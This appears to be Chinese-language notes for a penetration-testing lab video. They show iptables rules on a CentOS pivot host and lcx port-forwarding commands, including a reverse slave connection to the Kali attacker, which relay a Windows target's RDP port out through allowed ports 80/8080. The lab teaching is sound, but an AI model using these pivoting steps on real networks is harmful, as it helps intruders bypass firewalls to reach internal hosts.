0.实际操作视频请移步
https://www.bilibili.com/video/BV18e411j77E/
声明:请遵守网络安全法,若学员因此作出危害网络安全行为,与我本人无关。
1.靶场环境说明:
防火墙icmp协议禁止 tcp协议进出网,只允许tcp协议80 和8080端口出网
目标靶机win2012 仅主机模式 10.10.10.13
目标跳板机centos 桥接模式 192.168.1.24 仅主机模式 10.10.10.88
攻击机kali 桥接模式 192.168.1.5
2.跳板机centos防火墙规则
注意先后顺序,-I 是插入到第一条,所以越是后面添加的规则,越在前面,最后添加的规则在第一条,-A是追加本规则到最后一条
2.1禁止192.168.1.1/24网段的tcp进入
iptables -I INPUT -s 192.168.1.1/24 -p tcp -j DROP
2.2禁止192.168.1.1/24网段的icmp进入
iptables -I INPUT -s 192.168.1.1/24 -p icmp -j DROP
2.3设置允许访问本机的80端口,-I 是把本规则插入到第一位,防火墙是从上到下顺序生效
iptables -I INPUT -p tcp --dport 80 -m state --state NEW,ESTABLISHED -j ACCEPT
2.4允许发送本地主机的80端口响应
iptables -I OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
2.5设置允许访问本机的8080端口
iptables -I INPUT -p tcp --dport 8080 -m state --state NEW,ESTABLISHED -j ACCEPT
2.6允许发送本地主机的8080端口响应
iptables -I OUTPUT -p tcp --sport 8080 -m state --state ESTABLISHED -j ACCEPT
3.上一个视频回放
攻击机kali运行lcx
./lcx -listen 1111 7777
跳板机centos运行lcx
./lcx -slave 192.168.1.5 1111 10.10.10.13 3389
4.本次视频
4.1跳板机centos上执行 把目标机器10.10.10.13的3389端口转发到centos8080端口上
./lcx -tran 8080 10.10.10.13 3389
4.2跳板机centos上执行 把目标机器10.10.10.13的8080端口转发到centos8080端口上
./lcx -tran 8080 10.10.10.13 8080
